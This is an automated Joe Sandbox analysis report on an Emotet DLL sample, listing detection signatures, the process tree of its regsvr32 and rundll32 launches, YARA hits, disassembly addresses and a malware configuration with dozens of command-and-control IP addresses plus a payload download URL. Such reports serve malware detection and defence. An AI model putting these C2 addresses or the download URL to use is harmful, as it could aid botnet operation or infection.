Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UNUy8dUYWp.dll

Overview

General Information

Sample Name:UNUy8dUYWp.dll
Analysis ID:745030
MD5:3b7c18542e60716ebb377fce79f27b1e
SHA1:7df5649f7c8f8ed59f931f08ec0311bbf08d12e1
SHA256:8ec69127e6c6676189caf841242091ddd3365b52d4bf91967338534cf14eb9e5
Tags:dllexe
Infos:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Registers a DLL
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5964 cmdline: loaddll64.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4700 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 2424 cmdline: rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 1236 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 1004 cmdline: regsvr32.exe /s C:\Users\user\Desktop\UNUy8dUYWp.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 2128 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GoWbi\ladheq.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 2980 cmdline: rundll32.exe C:\Users\user\Desktop\UNUy8dUYWp.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • regsvr32.exe (PID: 5240 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CoOkhAHrtQc\nRwgXrJuSZa.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 2692 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RQcUhJCVUMzw\oVbDosZga.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 4952 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4180 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\FWERpTiWwMFl\CxZPHYYNr.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.316359005.0000015CC5300000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000C.00000002.463551545.00000000006B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000000.00000002.320549270.000002C323270000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.318872069.0000000000FA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.fa0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.regsvr32.exe.fa0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.15cc5300000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  0.2.loaddll64.exe.2c323270000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.15cc5300000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.4115.178.55.2249695802404304 11/13/22-17:51:55.664778
                      SID:2404304
                      Source Port:49695
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: UNUy8dUYWp.dllVirustotal: Detection: 43%Perma Link
                      Source: 00000006.00000002.699793780.0000000000A68000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C119410 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00007FF87C119410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C119410 CryptStringToBinaryA,CryptStringToBinaryA,3_2_00007FF87C119410
                      Source: UNUy8dUYWp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10C334 FindFirstFileExW,0_2_00007FF87C10C334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C10C334 FindFirstFileExW,3_2_00007FF87C10C334

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.4:49695 -> 115.178.55.22:80
                      Source: Malware configuration extractorIPs: 172.105.115.71:8080
                      Source: Malware configuration extractorIPs: 218.38.121.17:443
                      Source: Malware configuration extractorIPs: 186.250.48.5:443
                      Source: Malware configuration extractorIPs: 103.71.99.57:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 85.25.120.45:8080
                      Source: Malware configuration extractorIPs: 139.196.72.155:8080
                      Source: Malware configuration extractorIPs: 103.85.95.4:8080
                      Source: Malware configuration extractorIPs: 198.199.70.22:8080
                      Source: Malware configuration extractorIPs: 209.239.112.82:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 36.67.23.59:443
                      Source: Malware configuration extractorIPs: 104.244.79.94:443
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 103.56.149.105:8080
                      Source: Malware configuration extractorIPs: 80.211.107.116:8080
                      Source: Malware configuration extractorIPs: 93.104.209.107:8080
                      Source: Malware configuration extractorIPs: 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 202.28.34.99:8080
                      Source: Malware configuration extractorIPs: 178.62.112.199:8080
                      Source: Malware configuration extractorIPs: 114.79.130.68:443
                      Source: Malware configuration extractorIPs: 118.98.72.86:443
                      Source: Malware configuration extractorIPs: 103.41.204.169:8080
                      Source: Malware configuration extractorIPs: 178.238.225.252:8080
                      Source: Malware configuration extractorIPs: 83.229.80.93:8080
                      Source: Malware configuration extractorIPs: 46.101.98.60:8080
                      Source: Malware configuration extractorIPs: 82.98.180.154:7080
                      Source: Malware configuration extractorIPs: 87.106.97.83:7080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 139.59.80.108:8080
                      Source: Malware configuration extractorIPs: 103.224.241.74:8080
                      Source: Malware configuration extractorIPs: 103.254.12.236:7080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 165.22.254.236:8080
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 51.75.33.122:443
                      Source: Malware configuration extractorIPs: 128.199.217.206:443
                      Source: Malware configuration extractorIPs: 188.165.79.151:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 160.16.143.191:8080
                      Source: Malware configuration extractorIPs: 175.126.176.79:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 103.126.216.86:443
                      Source: Malware configuration extractorIPs: 190.145.8.4:443
                      Source: Malware configuration extractorIPs: 128.199.242.164:8080
                      Source: Malware configuration extractorIPs: 64.227.55.231:8080
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewIP Address: 172.105.115.71 172.105.115.71
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: unknownNetwork traffic detected: IP country count 20
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: regsvr32.exe, 00000006.00000003.556982564.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559095179.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.700003255.0000000000AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000006.00000003.558604736.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.700063463.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.425398899.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.425712583.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
                      Source: regsvr32.exe, 00000006.00000003.559372658.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.556387568.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699900412.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558688739.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000006.00000003.556982564.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.700222790.00000000026D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.425307919.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.425463433.00000000026D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559095179.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.700003255.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.425054511.0000000002669000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000002.699943736.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559372658.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.556387568.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.557436105.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559734873.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699900412.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558688739.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/nfpqxpxigscqbtd/kjtchfjkotww/ilol/
                      Source: regsvr32.exe, 00000006.00000003.559372658.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.556387568.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699900412.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558688739.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/s.dll

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.fa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.15cc5300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.2c323270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.15cc5300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.6b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.225b3ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.225b3ac0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.2c323270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.316359005.0000015CC5300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.463551545.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.320549270.000002C323270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.318872069.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.699725237.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.316792444.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.319281932.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.464095447.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.317583500.00000225B3AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.700370184.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.315165942.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeFile created: C:\Windows\system32\RQcUhJCVUMzw\Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C113FB00_2_00007FF87C113FB0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C1119100_2_00007FF87C111910
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10C3340_2_00007FF87C10C334
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10A3700_2_00007FF87C10A370
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10ABC00_2_00007FF87C10ABC0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800204540_2_0000000180020454
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028C940_2_0000000180028C94
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038A50_2_00000001800038A5
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800248E00_2_00000001800248E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800091440_2_0000000180009144
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB40_2_0000000180005DB4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004DDC0_2_0000000180004DDC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B1E00_2_000000018000B1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009E380_2_0000000180009E38
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003BE80_2_0000000180003BE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009BEC0_2_0000000180009BEC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800173F80_2_00000001800173F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017BF80_2_0000000180017BF8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800154000_2_0000000180015400
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800010000_2_0000000180001000
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000741C0_2_000000018000741C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E8280_2_000000018000E828
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800028340_2_0000000180002834
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180014C480_2_0000000180014C48
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002005C0_2_000000018002005C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800164640_2_0000000180016464
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800054780_2_0000000180005478
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800068800_2_0000000180006880
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002748C0_2_000000018002748C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001308C0_2_000000018001308C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800240980_2_0000000180024098
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B8980_2_000000018001B898
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000C4980_2_000000018000C498
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004CA00_2_0000000180004CA0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800110AC0_2_00000001800110AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800148B00_2_00000001800148B0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800078B60_2_00000001800078B6
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001CCC0_2_0000000180001CCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B8D00_2_000000018000B8D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800198DC0_2_00000001800198DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038DC0_2_00000001800038DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800264F80_2_00000001800264F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800084F80_2_00000001800084F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BD000_2_000000018000BD00
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800155080_2_0000000180015508
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018D0C0_2_0000000180018D0C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800121100_2_0000000180012110
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B5200_2_000000018001B520
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800291240_2_0000000180029124
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800135240_2_0000000180013524
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009D240_2_0000000180009D24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023D280_2_0000000180023D28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800021280_2_0000000180002128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800209300_2_0000000180020930
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F5500_2_000000018001F550
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180020D540_2_0000000180020D54
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800109540_2_0000000180010954
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800185600_2_0000000180018560
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E5700_2_000000018000E570
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C9740_2_000000018001C974
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000F1740_2_000000018000F174
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180025D840_2_0000000180025D84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800055900_2_0000000180005590
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800171980_2_0000000180017198
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800159A00_2_00000001800159A0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180011DAC0_2_0000000180011DAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1AC0_2_000000018000D1AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800069C00_2_00000001800069C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000A1D40_2_000000018000A1D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800079D80_2_00000001800079D8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C1DC0_2_000000018001C1DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1E00_2_000000018000D1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800199E80_2_00000001800199E8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800099EC0_2_00000001800099EC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028A040_2_0000000180028A04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001FA080_2_000000018001FA08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E6140_2_000000018001E614
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001A1C0_2_0000000180001A1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BA240_2_000000018000BA24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180021A2C0_2_0000000180021A2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800192300_2_0000000180019230
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BE340_2_000000018000BE34
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800122440_2_0000000180012244
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800066500_2_0000000180006650
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800016600_2_0000000180001660
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800116640_2_0000000180011664
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001827C0_2_000000018001827C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800246800_2_0000000180024680
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022A840_2_0000000180022A84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000AE840_2_000000018000AE84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800286900_2_0000000180028690
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800156940_2_0000000180015694
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800076940_2_0000000180007694
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800136980_2_0000000180013698
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800092980_2_0000000180009298
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002629C0_2_000000018002629C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001629C0_2_000000018001629C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000569C0_2_000000018000569C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180027EA40_2_0000000180027EA4
